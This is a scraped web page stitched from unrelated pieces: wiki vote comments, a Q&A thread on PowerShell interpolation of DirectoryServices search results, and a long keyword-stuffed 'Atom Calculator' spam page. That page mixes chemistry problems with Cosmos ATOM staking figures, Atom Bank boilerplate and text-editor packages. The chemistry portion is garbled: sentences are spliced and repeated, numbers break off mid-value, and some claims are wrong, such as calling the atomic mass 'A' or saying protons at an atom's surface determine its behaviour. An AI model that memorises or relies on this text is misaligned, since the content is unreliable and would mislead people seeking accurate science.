Support: I admire him! --Monfernape_If any problem? 11:16, July 5, 2014 (UTC)

Support: He doesn't make mistakes (unlike me). Ellis99 I'm feeling the flow! 11:26, July 5, 2014 (UTC)

Support: If I remember correctly, Shockstorm is a user from before the time of the split, and I would be glad to have some of those members back. :D

Neutral:

Oppose:
https://askdev.io/questions/108406/pricing-estimate-system-directoryservices
# Evaluating System.DirectoryServices.ResultPropertyCollection

I'm missing something below:

$objSearcher = New-Object System.DirectoryServices.DirectorySearcher
$objSearcher.SearchRoot = New-Object System.DirectoryServices.DirectoryEntry
$objSearcher.Filter = ("(objectclass=computer)")
$computers = $objSearcher.FindAll()

So the question is: why do the following two results differ?

$computers | %{
    "Server name in quotes $_.properties.name"
    "Server name not in quotes " + $_.properties.name
}

PS> $computers[0] | %{"$_.properties.name"; $_.properties.name}
System.DirectoryServices.SearchResult.properties.name
GORILLA

0 2019-12-02 03:04:02

Answers: 3

I think it has to do with the way PowerShell interpolates values inside double quotes. Try this:

"Server name in quotes $($_.properties).name"

Or you might even need another set of $(). I'm not somewhere I can test it right now.

0 2019-12-03 04:45:55

The following works correctly, but I would be interested if anyone has a deeper explanation.

PS C:\> $computers[0] | %{ "$_.properties.name"; "$($_.properties.name)" }
System.DirectoryServices.SearchResult.properties.name
GORILLA

So it would seem that $_.properties.name does not expand like I expected it to. If I'm picturing it correctly, the fact that the name property is multivalued causes it to return an array, which (I think) would explain why the following works:

$computers[0] | %{ $_.properties.name[0] }

If "name" were a string, this should return the first character, but because it is an array it returns the first element.

0 2019-12-03 04:45:29

When you include $_.properties.name in the string, it returns the type name of the property. When a variable is included in a string and the string is evaluated, PowerShell calls the ToString method on the object referenced by the variable (not including the members specified after it). In this case, the ToString method returns the type name. You can force the evaluation of the variable and its members, similar to what EBGreen suggested, by using

"Server name in quotes $($_.properties.name)"

In the other case, PowerShell evaluates the variable and the specified members first, and then appends the result to the preceding string. You are correct that you are getting back a collection of properties. If you pipe $computers[0].properties to Get-Member, you can explore the object model right from the command line. The important part is below.

TypeName : System.DirectoryServices.ResultPropertyCollection

Name   MemberType Definition
Values Property   System.Collections.ICollection Values {get;}

0 2019-12-03 04:13:26
http://grottenduro.it/atom-calculator.html
# Atom Calculator

The atomic number of an element is the number of protons in its nucleus; it can also be read as the number of electrons in a neutral atom. For example, an oxygen atom has 8 protons. Example 3 - number of protons in neon: the element neon (symbol Ne) has the atomic number 10.

Mole-to-atom conversion: 1 mole = 6.022 × 10²³ atoms, so 2 moles = 1.2044 × 10²⁴ atoms. One atom of sodium weighs about 3.82 × 10⁻²³ g. The cation, Na⁺, is generated by removal of an electron. An atom with high electronegativity pulls bonding electrons strongly towards itself. We don't have to worry about the formal charges on hydrogen.

Sample problems: calculate the energy for the transition of an electron from the n = 2 level to the n = 5 level of a hydrogen atom (h = 6.63 × 10⁻³⁴ J·s); to calculate the radius of a Bohr orbit of the hydrogen atom, you need the quantum number n; (a) calculate the fraction of atom sites that are vacant for copper (Cu) at its melting temperature of 1084 °C (1357 K); (b) calculate the percentage yield of ethanol if 445 g of ethanol is produced from 1.0 kg of glucose; a certain particle carries 2.5 × 10⁻¹⁶ C of static electric charge. This will help you with the solution of a wide variety of problems.

Compare live ATOM/PEN prices with over 2,500 currencies in real time, with historical charts and data pulled directly from top cryptocurrency exchanges. Atom Calculator is a popup calculator for an input item. This definite integral calculator is a free online tool to evaluate the value of a definite integral of a function.

The workers then stimulated the atom with a laser just enough to change its wave function; according to the new wave function of the atom, it now had a 50 percent probability of being in a "spin-up" state in its initial position and an equal probability of being in a "spin-down" state in a position as much as 80 nanometers away, a vast distance.

Looking at ions: we've talked about ions before. Remember that there is a maximum energy that each electron can have and still be part of its atom. Verify that the 3d_xy orbital given in the table is a normalized eigenfunction. A hydrogen atom has a volume of about 6.2 × 10⁻³¹ m³. We can, however, bypass the full calculation if we are only interested in an estimate.

The Atomic Models of Thomson and Rutherford: determining the structure of the atom was the next logical question to address following the discovery of the electron by J. J. Thomson.
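The percentage-yield exercise above can be checked with a short script. This is a minimal sketch, not code from the page: it assumes the fermentation stoichiometry C6H12O6 -> 2 C2H5OH + 2 CO2 and rounded molar masses, so the exact figure may differ slightly.

```python
# Percent yield of ethanol from glucose: C6H12O6 -> 2 C2H5OH + 2 CO2
M_GLUCOSE = 180.16  # g/mol
M_ETHANOL = 46.07   # g/mol

def percent_yield(mass_glucose_g: float, mass_ethanol_g: float) -> float:
    """Actual yield as a percentage of the theoretical yield."""
    moles_glucose = mass_glucose_g / M_GLUCOSE
    # 2 mol ethanol per mol glucose
    theoretical_ethanol_g = moles_glucose * 2 * M_ETHANOL
    return 100.0 * mass_ethanol_g / theoretical_ethanol_g

print(f"{percent_yield(1000.0, 445.0):.0f}%")  # about 87%
```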
(iii) 2 moles of carbon are burnt in 16 g of dioxygen. The work function for a caesium atom is 1.9 eV. This web page shows the scale of a hydrogen atom. Equipment: a computer with an internet connection, a calculator (the built-in calculator of the computer may be used), a few sheets of paper, and a pencil.

The atom is the smallest particle of a chemical element that can exist. The atomic number is very often represented symbolically as Z. The number of neutrons in an atom can vary within small limits; isotopes are atoms which have the same atomic number but different mass numbers. A nuclide is a species of atom with a specific number of protons and neutrons in the nucleus, for example carbon-13 with 6 protons and 7 neutrons.

The anion, I⁻, is formed by adding an electron to the neutral iodine atom: I + e⁻ → I⁻. Isotope conversion means changing the number of neutrons in the nucleus of an atom. If one of the atoms in a bond is more electronegative, it has a greater tendency to attract the bonding electrons, and the bond is then called a polar covalent bond.

If the atom economy is 100%, it means all the atoms that were involved in the process have been used during the process. (b) Repeat this calculation at room temperature (298 K).

Bohr noticed that the quantum constant formulated by the German physicist Max Planck has dimensions which, when combined with the mass and charge of the electron, produce a measure of length; numerically, the measure is close to the known size of atoms. This encouraged Bohr to use Planck's constant in searching for a theory of the atom. Use equation (2) to calculate Rydberg's constant, R = 1.097 × 10⁷ m⁻¹; solving for the wavelength of the n = 4 → n = 2 line of hydrogen gives a value of 486 nm.

The ionization equation makes a very simplistic assumption: that when an electron is removed from an atom or ion, the atom/ion remains unchanged except for the removal of that electron.
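The quoted Rydberg constant and the 486 nm line fit together through the Rydberg formula, 1/λ = R(1/n₁² − 1/n₂²). A minimal sketch of that standard physics (not code from the page):

```python
# Rydberg formula: 1/lambda = R * (1/n1**2 - 1/n2**2), with n2 > n1
R = 1.097e7  # Rydberg constant, m^-1

def wavelength_nm(n1: int, n2: int) -> float:
    """Wavelength (nm) of the photon emitted when the electron drops n2 -> n1."""
    inv_lambda = R * (1.0 / n1**2 - 1.0 / n2**2)
    return 1e9 / inv_lambda

print(f"{wavelength_nm(2, 4):.1f} nm")  # n = 4 -> 2 (Balmer series): about 486 nm
```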
Cosmos ATOM coin can be bonded to a network validator to receive staking rewards.

Calculate a weighted average of all the atoms of an element: the atomic mass of the carbon-14 isotope, for instance, is 14 amu, and 1 u has a value of about 1.6605 × 10⁻²⁷ kg. Adding or removing electrons from an atom does not change which element it is, just its net charge. The higher the bond order, the more stable the molecule. The formula weight of NaCl is 58.44 g/mol (22.99 g/mol + 35.45 g/mol). The number of lone pairs on the nitrogen atom = (v − b − c)/2 = (5 − 3 − 0)/2 = 1.

Calculate the Energy! (student worksheet): Niels Bohr numbered the energy levels (n) of hydrogen, with level 1 (n = 1) being the ground state, level 2 the first excited state, and so on. We can find the number of moles of water using the equation: number of moles = mass ÷ molar mass. However, it's a decent approximation. The diameter of a zinc atom is 2.6 Å; calculate (a) the radius of a zinc atom in pm and (b) the number of atoms present in a length of 1.6 cm if the zinc atoms are arranged side by side lengthwise.

SADIC input is a PDB file, and the exposed area for each atom is computed using a probe radius of 1.4 Å. Physicists use laser beams to create an atom trap in which atoms are confined within a spherical region of space with a diameter of about 1 mm. Protons at the atom's surface determine the atom's behavior (for details of the calculation see Zimmerman). If no extra keywords are listed, then the potential energy is the sum of pair, bond, angle, dihedral, improper, kspace (long-range), and fix energy.

Typical exercises: calculate formula/molecular mass; calculate moles for a specific substance; perform (terrifying) calculations involving mass, moles and number of particles for several substances. Just to be clear, this is about counting the number of atoms present in a chemical formula without involving your calculator.

Install atom-calca either in Atom's Preferences/Install Packages, or with apm on the command line: apm install atom-calca

Chip-comparison pages also appear: Apple A6X (APL5598), Apple A7 vs Apple A8.

ICX and ATOM both offer a 10% return on your investment; AWC currently gives the highest return at 20% ROI. A staking rewards calculator gives the exact final value of ATOM one will have after 1 year with n redemptions of rewards spaced evenly throughout the year.
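The "n redemptions spaced evenly throughout the year" sentence describes periodic compounding. A sketch under that reading; the stake and reward rate below are made-up inputs, not figures from the page:

```python
# Final stake after one year with n evenly spaced reward redemptions,
# i.e. periodic compounding: final = stake * (1 + rate/n) ** n
def final_atom(stake: float, annual_rate: float, n_redemptions: int) -> float:
    return stake * (1.0 + annual_rate / n_redemptions) ** n_redemptions

stake = 100.0  # ATOM delegated (example value)
rate = 0.10    # assumed 10% annual reward rate
for n in (1, 12, 365):
    print(n, round(final_atom(stake, rate, n), 3))
# more frequent restaking approaches the continuous limit stake * e**rate
```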
If one knows the atomic number Z of an atom and its neutron number N, then one can also calculate the atomic mass of the atom, also referred to as A: the mass number is the sum of the protons and neutrons in the nucleus. Isotopes (same protons, different neutrons) have all the same properties and behaviors of the atom type save one: the atomic mass. Though technically incorrect, the term "atomic weight" is also often used to refer to the average atomic mass of all of the isotopes of one element. Ion charges are written using small numbers with + or − after the atom's symbol.

A hydrogen atom is made from a single proton that's circled by a single electron. How big is a hydrogen atom? The radius of a hydrogen atom is known as the Bohr radius. Below is a diagram that shows the probability of finding an electron around the nucleus of a hydrogen atom; notice that the 1s orbital has the highest probability. The Rutherford scattering experiment put to rest the Thomson model of the atom, because it could be shown that a positive charge distributed throughout the classical volume of the atom could not deflect alpha particles by more than a small fraction of a degree. Atomic theory stayed a mostly philosophical subject, with little actual scientific investigation or study, until the development of chemistry in the 1650s.

An atom: the smallest particle of an element that has all the properties of that element. If an atom has only 6 electrons in its outer shell, it will try to gain 2 from another atom, which is part of what causes atoms to bond in various ways. Volume = mass ÷ density, and another way to calculate atomic volume is to use the atomic or ionic radius of the atom (depending on whether or not you are dealing with an ion).

Exercises: predict how the addition or subtraction of a proton, neutron, or electron changes an atom; calculate the lattice constant a of an fcc crystal; calculate the average value of the kinetic energy of an electron in the 3s state of a hydrogen atom; if the radius of a carbon atom is 0.15 nm, calculate the number of carbon atoms which can be placed side by side in a straight line across a scale 20 cm long; calculate the cost of a single aluminium atom using data measured from a piece of aluminium foil. PART 2 - ATOM ECONOMY: 8) write the formula for % atom economy and calculate the atom economy to make sodium from sodium chloride.

Number density given atom fraction (abundance): it is often necessary to compute the concentration of an individual isotope j given its fractional abundance, using N = ρN_A/M with Avogadro's number 6.0221 × 10²³ atoms/mol.

For allowances (car, shift and area), please add these to basic income when keying into the affordability calculator. Intel Atom x5-Z8500 vs Intel Atom x5-Z8300: note that TDP is only a specification of thermal design power. The Mental Health Map tests for specific genetic variants that have been shown to influence behavior, mood, stress response and more.
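Two of the relations above reduce to one-liners: A = Z + N for the mass number, and the sphere volume V = (4/3)πr³ for the atomic-volume estimate from a radius. A minimal sketch:

```python
import math

def mass_number(protons: int, neutrons: int) -> int:
    """Mass number A = Z + N."""
    return protons + neutrons

def atomic_volume(radius_m: float) -> float:
    """Volume of a sphere with the given atomic (or ionic) radius, in m^3."""
    return 4.0 / 3.0 * math.pi * radius_m**3

print(mass_number(29, 34))      # copper-63 -> 63
print(atomic_volume(5.29e-11))  # Bohr radius -> about 6.2e-31 m^3
```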
atom-calca package. (a) Calculate the atom economy for the production of ethanol.

Diamagnetic materials create an induced magnetic field in a direction opposite to an externally applied magnetic field and are therefore repelled by the applied field. In addition, you can define the charge of ions with known numbers of protons and electrons.

For the copper-63 mass defect: (0.59223 amu/nucleus)(1.6605 × 10⁻²⁷ kg/amu) = 9.8346 × 10⁻²⁸ kg/nucleus.

In this video, Suhani Ma'am explains how to find the formal charge on any molecule or atom; she gave a fantastic trick for finding it. So we have to calculate the formal charge on the nitrogen, carbon, nitrogen, carbon, oxygen, oxygen, oxygen. An electron can become excited if it is given extra energy, such as by absorbing a photon.

Calculate the expectation values of r, r² and r⁻¹ in the ground state of the hydrogen atom; give the results in atomic units. The operator of the kinetic energy in spherical coordinates for all s orbitals is −(1/2)(d²/dr² + (2/r) d/dr) in atomic units. The numerical result is given above and agrees with Pauling and Beach to the quoted precision.

calculations_atom_single; alkali_atom_functions: saveCalculation(calculation, fileName) saves a calculation for future use. Links to other pages in this topic: Constituents of the Atom; Stable and Unstable Nuclei; Particle Interactions; Alpha Scattering by Charge Cloud.
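The formal-charge trick referred to above is the usual bookkeeping rule FC = (valence electrons) − (lone-pair electrons) − ½(bonding electrons). A small sketch of that arithmetic; the CO₂ numbers are a standard textbook example, not taken from the page:

```python
def formal_charge(valence: int, lone_pair_electrons: int, bonding_electrons: int) -> int:
    """FC = V - N - B/2 for one atom in a Lewis structure."""
    return valence - lone_pair_electrons - bonding_electrons // 2

# O=C=O: each oxygen has 4 lone-pair electrons and 4 bonding electrons
print(formal_charge(6, 4, 4))  # oxygen in CO2 -> 0
print(formal_charge(4, 0, 8))  # carbon in CO2 -> 0
```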
Atom economy for steam reforming of methane, CH₄ + 2 H₂O → CO₂ + 4 H₂. Formula masses: CH₄ = 16, H₂O = 18, H₂ = 2. Sum of the formula masses of all reactants = 16 + 2(18) = 52. Atom economy for hydrogen = (4 × 2)/52 × 100 = 15.4%. Calculate the amount of carbon dioxide that could be produced when (i) 1 mole of carbon is burnt in air.

Energy levels for the hydrogen atom can be calculated from the equation E = −1312/n² kJ/mol; in this equation the energy E is a function of the energy level n. Calculate the shortest wavelength in the Balmer series of the hydrogen atom. The energy of an excited hydrogen atom is −3.4 eV.

To calculate bond order in chemistry, subtract the number of electrons in antibonding orbitals from the number of electrons in bonding orbitals, then divide the result by 2. When two atoms bond to form a molecule, the electrons in the bond are not necessarily shared equally. The molar mass of carbon, 12.01, is the mass in grams of one mole of carbon. Nuclei with the same number of protons but different numbers of neutrons are isotopes. Atomic weight, also called relative atomic mass, is the ratio of the average mass of a chemical element's atoms to some standard.

This online calculator can be used for computing the average molecular weight (MW) of molecules by entering their chemical formulas (for example C3H4OH(COOH)3). Average Atomic Mass Calculator; Grams to Moles calculator.

get_potential_energy(force_consistent=False, apply_constraint=True): calculate the potential energy; ask the attached calculator to calculate the potential energy and apply constraints.
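The garbled atom-economy figure above works out as follows. A hedged sketch of the same calculation, using atom economy = mass of desired product ÷ total mass of all products × 100:

```python
# CH4 + 2 H2O -> CO2 + 4 H2, with H2 as the desired product
def atom_economy(desired_mass: float, total_product_mass: float) -> float:
    return 100.0 * desired_mass / total_product_mass

m_H2, m_CO2 = 2.0, 44.0
print(f"{atom_economy(4 * m_H2, m_CO2 + 4 * m_H2):.1f}%")  # about 15.4%
```

Note that the total product mass (44 + 8 = 52) equals the reactant mass the page quotes, as mass conservation requires.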
The calculator will let you know the approximate dose based on other users' experience with the same parameters. A staking site tracks the staking yield, proof-of-stake metrics, blockchain data and everything useful for earning passive returns by delegating Cosmos (ATOM).

The diagram below depicts a lithium atom with three protons and four neutrons. The effective nuclear charge on an electron is given by the equation Z_eff = Z − S. The theory developed should be applicable to hydrogen atoms and ions having just one electron; the level energies follow −13.6 × (1/n²) eV. For the hydrogen atom, ionization from the ground state (n_i = 1) requires ΔE_izn = 2.18 × 10⁻¹⁸ J.

Sample problems: calculate the frequency of light emitted when an electron falls from level four to level one (principal quantum number n = 4 to n = 1) in a hydrogen atom; calculate the volume of the unit cell.

First, you need to download and install the app. Before you begin, look through the Periodic Table of Elements and pick an atom; choose an atom with an atomic number of at least 11, since it then has at least three energy-level rings [source: Atomic Model Construction]. Then follow these steps: Step 1…

You can find a full list of our accepted income types on our lending criteria page. Bitcoin Atom mining stats: difficulty 1.7514M | network hashrate 203… Here is a simple online oxidation number calculator for finding the oxidation number of any compound or element by just clicking on the respective compound name in the given elements table.

Atom describes itself as a hackable text editor, and what that means is that it allows new and intermediate programmers the chance to create their own text editor without years of work or programming experience. Calculator Soup is a free online calculator.
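The level-four-to-level-one problem above follows from E_n = −13.6/n² eV together with f = ΔE/h. A minimal sketch with rounded constants:

```python
H = 6.626e-34   # Planck constant, J*s
EV = 1.602e-19  # joules per electronvolt

def level_energy_eV(n: int) -> float:
    """Bohr-model energy of hydrogen level n, in eV."""
    return -13.6 / n**2

def emitted_frequency(n_high: int, n_low: int) -> float:
    """Frequency (Hz) of the photon emitted for the n_high -> n_low drop."""
    delta_E = (level_energy_eV(n_high) - level_energy_eV(n_low)) * EV
    return delta_E / H

print(f"{emitted_frequency(4, 1):.3e} Hz")  # about 3.1e15 Hz
```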
‎The atom calculator is a tool for calculating the atomic number and the mass number based on the numbers of atom components - protons, neutrons, and electrons (or vice versa). Polyatomic Ion Calculator introduction: the purpose of this calculator is to determine the scientific name of the ionic molecule entered. Moles to Atoms Calculator: enter the total number of atoms of a substance and the average atomic mass of the substance into the calculator. Example output: 1.2192 × 10⁻² mol; percent composition (by mass) is listed per element as count, atomic mass and % by mass.

To calculate the mass of a single atom, first look up the atomic mass of the element from the periodic table and divide by Avogadro's number. (Hint: the mass of an ion is the same as that of an atom of the same element.) Given the atomic weight of iron, 55.87 u, calculate Avogadro's number; also calculate the density of iron. The density relation ρ = mass/volume gives atom counts per cm³ in the same way. ConvertUnits.com provides an online conversion calculator; you can find metric conversion tables for SI units as well.

Atomic mass: "An atomic weight (relative atomic mass) of an element from a specified source is the ratio of the average mass per atom of the element to 1/12 of the mass of ¹²C" in its nuclear and electronic ground state. Calculate electronegativity: in chemistry, electronegativity is a measure of how strongly an atom attracts the electrons in a bond.

The first historical mention of the word atom came from works by the Greek philosopher Democritus, around 400 BC. If you were somehow able to change the proton number of an oxygen atom to 7, even if everything else remained the same, it would no longer be an oxygen atom; it would be nitrogen.

Atom economy practice: 2 NaCl → 2 Na + Cl₂; 9) calculate the atom economy to make hydrogen from the reaction of zinc with hydrochloric acid. You can delegate/bond your ATOM in a single click within Ledger or many other wallets.

Technician A says that a vehicle may be considered non-drivable if the seat belt retractor is damaged in the collision. The space shuttle is taking off on Saturday; the departure time is 3:00 p.m.
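The "atom calculator" recipe quoted above (atomic number and mass number from proton, neutron and electron counts) is three lines of arithmetic. A sketch:

```python
def describe_atom(protons: int, neutrons: int, electrons: int) -> dict:
    """Atomic number, mass number and net charge from particle counts."""
    return {
        "atomic_number": protons,           # Z
        "mass_number": protons + neutrons,  # A = Z + N
        "charge": protons - electrons,      # + for cations, - for anions
    }

print(describe_atom(11, 12, 10))  # Na+ : Z=11, A=23, charge=+1
```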
Adding a proton to an atom makes a new element, while adding a neutron makes an isotope, or heavier version, of that atom. Z is the number of protons in the nucleus (the atomic number). The ground state of an electron, the energy level it normally occupies, is the state of lowest energy for that electron.

The mass of atoms is measured in terms of the atomic mass unit, which is defined to be 1/12 of the mass of an atom of carbon-12, or about 1.6605 × 10⁻²⁷ kg. Example: determine the binding energy of the copper-63 atom. Convert the mass defect into energy using ΔE = Δmc², where c = 2.998 × 10⁸ m/s.

Enter search mode first, then enter parameters and click the "Calculate" button. Data should be separated by comma (,), space, tab, or on separate lines. How to use the Atomic Mass Calculator? How do you calculate the atomic number of an atom when the wavelength is known? (Asked 5 years, 6 months ago.) 19 calculators; in addition, learn about the definition of average, or explore many other calculators.

Atom Bank is a challenger bank which was publicly launched in 2016. "Atom bank", "Atom" and "Digital Mortgages by Atom bank" are trading names of Atom bank plc, a company registered in England and Wales with company number 08632552; registered office: The Rivergreen Centre, Aykley Heads, Durham DH1 5TS. Enter the total credit card and overdraft balances that will be paid off by the applicant(s) at completion.

Enter your sex, weight, the strain of the kratom you will be taking, and how frequently you dose, or plan to dose.

It's a meta-counter that can count everything you do with or without Atom, a hackable text editor for the 21st century.
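The copper-63 binding-energy example can be reproduced from the mass defect. The masses below are standard tabulated values, not figures given on the page, so treat the script as an illustration; its mass defect (about 0.592 u) matches the stray "0.59223 amu/nucleus" figure earlier in the text:

```python
M_H = 1.007825      # mass of a hydrogen atom (proton + electron), u
M_N = 1.008665      # mass of a neutron, u
U_TO_MEV = 931.494  # energy equivalent of 1 u, MeV

def binding_energy_MeV(Z: int, N: int, atomic_mass_u: float) -> float:
    """Total nuclear binding energy from the atomic mass defect."""
    mass_defect = Z * M_H + N * M_N - atomic_mass_u
    return mass_defect * U_TO_MEV

print(f"{binding_energy_MeV(29, 34, 62.929601):.1f} MeV")  # Cu-63: about 551 MeV
```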
You can then view an element's: name; symbol; atomic number; atomic mass (weight); number of protons, neutrons and electrons; electron shells. No in-app purchases, no permissions. If there is anything you would like to see added, please comment with your suggestion.

This helps you measure the return on investment (ROI) of Cosmos (ATOM). These calculations take into account the current reward rate, prices, and other assumptions.

import numpy
x = 1
y = 1
z = 1
v = numpy.array([x, y, z])  # assumption: the source fragment broke off after "numpy." and repeated "y = 1"

0.5 mole of nitrogen atoms is 7 g. The number of moles of H atoms in a sample is the total number of H atoms divided by Avogadro's number. Grams to Moles calculator.
Assets such as ZIL offer an ROI of 16%, which fluctuates and is not locked at that rate. The 24h volume of ATOM is $308,728,681, while the Cosmos market cap is $4,655,850,136, which ranks it #18 among all cryptocurrencies.

The atom is the basic building block for all matter in the universe. When an atom is attracted to another atom because it has an unequal number of electrons and protons, the atom is called an ion. Water has a partial negative charge (δ−) near the oxygen atom, due to the unshared pairs of electrons, and partial positive charges (δ+) near the hydrogen atoms. A carbon-12 atom has a mass of exactly 12 u; since 1961 the standard unit of atomic mass has been one-twelfth the mass of an atom of the isotope carbon-12. Indicate the incorrect orbital designations among: 1s, 1p, 2d, 3s, 4f, 7f.

Atom economy = (mass of desired product ÷ total mass of all products) × 100. Problem: what is the energy of an electron in the n = 3 energy state of a hydrogen atom?

Atom Calculator allows you to search for elements of the periodic table using their name, symbol or atomic number. To calculate the oxidation numbers of the elements in a chemical compound, enter its formula and click "Calculate" (for example: Ca2+, HF2^-, Fe4[Fe(CN)6]3, NH4NO3, SO4^2-, CH3COOH, CuSO4·5H2O). Interactive, free online calculator from GeoGebra: graph functions, plot data, drag sliders, create triangles, circles and much more. The goal is to add various kinds of exercises dealing with molecular formulae, monoisotopic mass and isotopic distribution.

Therefore, if we make a proton the size of the picture above, 1000 pixels across, then the electron orbiting this proton is located 50,000,000 pixels to the right (but could be found anywhere in the sphere around the proton at that distance). Bohr, in 1913, explained the hydrogen spectrum on a theoretical basis with his famous model of the hydrogen atom.

A worked free-electron-density example arrives at 8.485 × 10²² free electrons per cm³ (one conduction electron per atom), and the volume per atom is the reciprocal of the atoms-per-cm³ figure.
A sample of any element consists of one or more isotopes of that element. Calculate the total energy (J/mole) emitted when electrons of 1. SADIC samples the space around each atom of a given molecule evaluating the portion of volume that is external to any protein atom. Atomic number is very often symbolically represented as Z. Search radioactive activation products of elements and nuclides exposed to neutron radiation. How to calculate atomic number of an atom when wavelength is known? Ask Question Asked 5 years, 6 months ago. How to Use Grams to Atoms Calculator? The procedure to use the grams to atoms calculator is as follows: Step 1: Enter the atomic mass number, grams and x in the respective input field. The atomic radius of a chemical element is a measure of the size of its atoms, usually the mean or typical distance from the center of the nucleus to the boundary of the surrounding shells of electrons. The atom economy (atom utilisation) of a chemical reaction is a measure of the percentage of the starting materials that actually end up in useful products *. To find the binding energy, add the masses of the individual protons, neutrons, and electrons, subtract the mass of the atom, and convert that mass difference to energy. Divide the result by 2 to get the result. When you want to find where an electron is at any given time in a hydrogen atom, what you’re actually doing is finding how far the electron is from the proton. If an atom is what is called an "ion," then that means it has a different number of electrons than you’d expect. Calculate the Energy! Student Worksheet Neils Bohr numbered the energy levels (n) of hydrogen, with level 1 (n=1) being the ground state, level 2 being the first excited state, and so on. An atom can gain or lose electrons, becoming what is known as an ion. If an atom gains an electron then it has more electrons, which gives it a negative charge. A typical atom consists of a central, small, dense nucleus containing protons and neutrons. Calculate the potential energies of all the atoms. Diameter of one carbon atom = 7. This compute calculates a per-atom array with nlvalues columns, giving the Q l values for each atom, which are real numbers on the range 0 <= Q l <= 1. The energy of an excited hydrogen atom is -3. Atomic weight, also called relative atomic mass, ratio of the average mass of a chemical element's atoms to some standard. Nuclei with the same number of protons but different numbers of neutrons are. omnicalculator. How to calculate the number of protons, electrons, and neutrons in a neutral atom. This site uses an exact value of 6. 095 g/cm^3 = 8. of valence electrons in the concerned atom in free state (i. of σ-bonds + no. 1 The Atomic Models of Thomson and Rutherford Determining the structure of the atom was the next logical question to address following the discovery of the electron by J. You can see how Atom Bank performed in our latest mortgage satisfaction survey in the table below. So, as it is easily understandable when an atom has a high electronegativity, it will have more strength […]. 097x10 7 m-1. Compare live ATOM/AUD prices with over 2,500 currencies in real-time with historical charts and data pulled directly from top cryptocurrency exchanges. Interactive, free online calculator from GeoGebra: graph functions, plot data, drag sliders, create triangles, circles and much more!. 
Using the Bohr theory of the atom, calculate (a) the radius of the orbit, (b) the linear momentum of the electron, (c) the angular momentum of the electron, (d) the kinetic energy of the electron, (e) the potential energy of the system, and (f) the total energy of the system. A beautiful, free 4-Function Calculator from Desmos. Calculations can be performed on local files as well as remote files using http and ftp protocols. The negative indicates that on 'gain' of electron, #2. In this video, Suhani Ma’am is, well explained how to find a formal charge on any molecule or atom. A change in electrons can make an atom have a charge. Visible light wavelengths are usually expressed in nanometers (nm), and give photon energies that are given in electronvolts (eV) or kJ/mol. How to calculate the charge of an atom using the number of protons and electrons. 2500 BCA | Check the list of Bitcoin Atom mining pools, historical data, and available mining software and hardware. Calculate the energy for the transition of an electron from the n = 2 level to the n = 5 level of a hydrogen atom. This is written by using little numbers with + or - after the atom's letters. The molar mass of Na is 22. Price * Interest Rate * % Period (months. guru to get an idea on the various math concepts and its calculators. The 24h volume of [ATOM] is $308 728 681, while the Cosmos market cap is$4 655 850 136 which ranks it as #18 of all cryptocurrencies. When an atom is attracted to another atom because it has an unequal number of electrons and protons, the atom is called an ION. The goal is to add various kinds of exercises dealing with molecular formulae, monoisotopic mass and isotopic distribution. A carbon-12 atom has a mass of 12 u. Bohr noticed, however, that the quantum constant formulated by the German physicist Max Planck has dimensions which, when combined with the mass and charge of the electron, produce a measure of length. import numpy x = 1 y = 1 y = 1 v = numpy. and Canada. Then, follow these steps: Step 1. Assume an energy for vacancy formation of 0. 6 cm if the zinc atoms are arranged side by side lengthwise. You can buy ATOM with a credit card or exchange from another cryptocurrency within the wallet. An atom is the smallest form of matter that connote be divided without changing into something else. Answer (1 of 4): First you need to know the molecular formula for the molecule. An atom can have the following charges: positive, negative, or neutral, depending on the electron distribution. Click here👆to get an answer to your question ️ Calculate the oxidation number of sulphur atom in Na2SO4. 384959974 x 10^23 atoms/cm^3 = 2. Calculator Plugins User's Guide. The diameter of zinc atom is 2. ConvertUnits. Quickly convert atoms into moles using this online atoms to moles. This encouraged Bohr to use Planck's constant in searching for a theory of the atom. Therefore, if we make a proton the size of the picture above, 1000 pixels across, then the electron orbiting this proton is located 50,000,000 pixels to the right (but could be found anywhere in the sphere around the proton at that distance). Calculate the total energy (J/mole) emitted when electrons of 1. 022×10^23 atoms. Steps on How to Calculate Coordination Number? Step 1: Identify the central atom in the chemical formula. You can delegate/bond your ATOM in a single click within Ledger or many other wallets. 8 * 10^-23 grams (approximately). 
If no extra keywords are listed, then the potential energy is the sum of pair, bond, angle, dihedral,improper, kspace (long-range), and fix energy. Moles to Atoms Calculator Enter the total number of moles of a substance into the moles to atoms calculator. One mole of carbon is 6. The atomic number of an element, also called a proton number, tells you the number of protons or positive particles in an atom. If you want to reinvest your rewards, you have to manually claim them and delegate again. 1% ROI for staking. This web site provides a process to calculate economic return to N application with different nitrogen and corn prices and to find profitable N rates directly from recent N rate research data. This Cosmos calculator projects potential rewards from the amount of ATOM delegated via stakefish. Atom Calculator Application. This repl has no cover image. Q:-The mass of an electron is 9. "An atomic weight (relative atomic mass) of an element from a specified source is the ratio of the average mass per atom of the element to 1/12 of the mass of 12 C" in its nuclear and electronic ground state. it quite is adverse because of the fact artwork must be accomplished via the electron with the intention to flee the pull of the proton (gravitational analogy works right here). 99 g/mol + 35. Calculate the wavelength of light that corresponds to the transition of the electron from the n=4 to the n=2 state of the hydrogen atom. It's Spring cleaning time! Everything must go! Time to get some good deals people. It was already established the. Give your answers in kilograms. This is the atomic weight of gold. When an atom absorbs a photon, it jumps up to a higher level; the difference in energy of the two levels must be equal to the energy of the photon. 9994)]g/mol ( 5g/cm )(6. Technician A says that a vehicle may be considered non-drivable if the seat belt retractor is damaged from the collision. 0 g atom of hydrogen undergo traning giving the spectral line of lowest energy in the visible region of its atoms spectrum. 18xx10^-18"Joules"# to remove the electron from n = 1 energy level to #n=oo#. For example, there are three kinds of carbon atom 12C, 13C and 14C. The mass of 0. 1 × 10 –31 kg. This online calculator you can use for computing the average molecular weight (MW) of molecules by entering the chemical formulas (for example C3H4OH(COOH)3). Each atom has an integer number of neutrons, but the periodic table gives a decimal value because it is a weighted average of the number of neutrons in the isotopes of each element. By using this website, you agree to our Cookie Policy. It is sometimes useful to calculate the formal charge on each atom in a Lewis structure. How to calculate atomic number of an atom when wavelength is known? Ask Question Asked 5 years, 6 months ago. The operator of the kinetic energy in spherical coordinates for all s orbitals is: 1d2 2 d 2 dr + r d 1 dr. Answer (1 of 4): First you need to know the molecular formula for the molecule. Here's what you need:. (a) Calculate the fraction of atom sites that are vacant for copper (Cu) at its melting temperature of 1084°C (1357 K). This is an example of poor atom economy! continua nella prossima slide ; The percentage atom economy can be calculate by taking the ratio of the mass of the utilized atoms (137) to the total mass of the atoms of all the reactants (275) and multiplying by 100. 
